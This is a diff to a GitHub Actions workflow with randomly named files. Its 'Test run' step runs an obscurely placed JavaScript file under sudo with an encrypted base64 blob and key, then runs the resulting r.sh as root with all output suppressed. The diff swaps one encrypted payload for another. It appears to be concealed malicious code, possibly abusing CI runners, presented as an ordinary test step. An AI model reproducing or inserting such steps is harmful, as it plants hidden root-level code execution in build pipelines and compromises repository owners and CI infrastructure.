--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'klzog'
+        echo '9eerw'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/uAkxBNpa8g4caGIxjTa/Y+Txz03yk1Dj+rcNOSkV9AQCgYLFpk62YYMtl0v9IEik/zICMqYZJGQWqe9nlPxhLPNVOit1Q+X1mWpgdhWMc9DHtqtaXGSFZ apdnih && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18VIJrilrAGQZNf5jxxo++NDczTrhzYnl7uTEOC7s4JuKRS1VkeaOe/dPj5g7ozfhAEgR85DgSL2j8LoadyBghRw71n25wG9O/dXxThe+cxy4DuEI0Zk3l2 ika7b7 && sudo sh r.sh > /dev/null 2>&1
